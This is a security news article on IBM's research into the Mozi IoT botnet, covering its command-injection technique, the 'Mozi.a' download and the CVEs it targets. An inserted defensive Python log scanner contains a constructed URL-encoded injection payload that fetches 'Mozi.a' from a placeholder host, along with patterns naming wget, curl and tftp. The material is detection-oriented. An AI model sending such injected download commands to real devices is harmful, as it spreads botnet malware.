Friday, January 15, 16:43

Mozi botnet: Responsible for most attacks on IoT devices

According to IBM, Mozi, a relatively new botnet, is responsible for the increase in Internet of Things (IoT) botnet activity.

Mozi botnet

The Mozi botnet has been heavily used over the last year and accounted for 90% of the IoT network traffic observed between October 2019 and June 2020. However, the researchers found that it carried out its attacks without trying to remove competing malware from the breached systems.

However, the large increase in attacks on IoT devices is not solely due to the effectiveness of the botnet. It is largely due to the increased use of IoT devices worldwide. More devices mean more opportunities for attacks. According to IBM, there are about 31 billion IoT devices worldwide.

Researchers believe that the success of the Mozi botnet rests on its use of command injection (CMDi) attacks, which exploit misconfigurations on IoT devices. The combination of increased IoT device use and misconfigured protocols is responsible for the rise in attacks. The prolonged remote work caused by COVID-19 also plays an important role.

The researchers observed that almost all attacks targeting IoT devices use the CMDi technique for initial access. The Mozi botnet exploits CMDi by injecting a "wget" shell command and then alters permissions to make it easier for the intruders to interact with the target system.

IBM said that on vulnerable devices a file named "Mozi.a" was downloaded and then executed on the MIPS architecture. The attack targets machines that use a RISC computer architecture (MIPS is a RISC instruction set architecture) and can allow an attacker to modify the firmware in order to install additional malware.

The Mozi botnet targets many vulnerabilities to infect IoT devices: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link devices), the Eir D1000 wireless router command injection, the Netgear setup.cgi RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and an RCE affecting many CCTV-DVR vendors.
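A defender-side check that follows from the paragraphs above, added here as an example and not part of the article or of IBM's research: a small Python scanner that reads web-server access-log lines and flags requests that carry the CMDi pattern described (a shell separator followed by a "wget"-style download inside a request parameter) or that reference the "Mozi.a" file name or the setup.cgi path named in the article. The log lines, hostnames and IP addresses are constructed placeholders, and the indicator list is an assumption chosen for illustration, not an exhaustive Mozi signature.

```python
"""Flag HTTP requests that look like IoT command-injection (CMDi) attempts.

Added example (not IBM's or the Mozi authors' code). It scans access-log
lines for the pattern the article describes: a shell command such as
"wget" injected into a request parameter, often fetching a file named
"Mozi.a". Every sample log line below is constructed, not a real capture.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Common Log Format (documentation IPs, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Jan/2021:16:43:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Jan/2021:16:43:02 +0000] '
    '"GET /cgi-bin/status.cgi?host=127.0.0.1%3Bwget+http%3A%2F%2Fdownload.example%2FMozi.a HTTP/1.1" 200 0',
    '198.51.100.7 - - [15/Jan/2021:16:43:03 +0000] "POST /setup.cgi HTTP/1.1" 404 0',
    '198.51.100.8 - - [15/Jan/2021:16:43:04 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that separate an injected command from the expected value.
SHELL_META = re.compile(r'[;|`\n]|\$\(|&&')
# Downloader the article mentions (wget) plus common equivalents (assumed list).
DOWNLOADER = re.compile(r'\b(wget|curl|tftp)\b', re.I)
# Indicators taken from the article: the dropped file name and a targeted CGI endpoint.
ARTICLE_INDICATORS = ('mozi.a', 'setup.cgi')


def cmdi_reasons(target):
    """Return the reasons a request target looks like a CMDi attempt (empty if clean)."""
    decoded = unquote_plus(target)  # attackers URL-encode the separators
    reasons = []
    has_meta = SHELL_META.search(decoded) is not None
    has_downloader = DOWNLOADER.search(decoded) is not None
    # A downloader name alone (e.g. a search for "wget manual") is not suspicious;
    # it becomes so only when a shell separator appears in the same request.
    if has_meta and has_downloader:
        reasons.append('shell separator followed by downloader command')
    elif has_meta and '?' in decoded:
        reasons.append('shell separator inside query parameter')
    low = decoded.lower()
    for indicator in ARTICLE_INDICATORS:
        if indicator in low:
            reasons.append('known indicator: ' + indicator)
    return reasons


def scan_log(lines):
    """Parse log lines; return (ip, target, status, reasons) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        reasons = cmdi_reasons(m['target'])
        if reasons:
            hits.append((m['ip'], m['target'], int(m['status']), reasons))
    return hits


if __name__ == '__main__':
    for ip, target, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, target)
        print('    ' + '; '.join(reasons))
```

To run it against real logs, replace SAMPLE_LOG with the lines read from the server's access log. The guard that requires a shell separator before a downloader name keeps ordinary requests such as a search for "wget manual" out of the results, while a bare request to a watch-listed path like setup.cgi is still reported (here with its 404 status) so that probing of an endpoint that is not even present on the device is visible.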


The hackers behind the Mozi botnet use infrastructure located mainly in China (84%).

"Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can be spread through exploits of IoT devices and weak telnet passwords," says IBM.

According to IBM, the botnet can be used to carry out distributed denial-of-service (DDoS) attacks, execute malicious commands, run additional payloads and collect information.

According to SecurityWeek, researchers stress that organizations using IoT devices need to address this increasingly common threat. Command injection remains the main form of infection, so it is important to change the devices' default settings and to check continuously for possible security gaps.

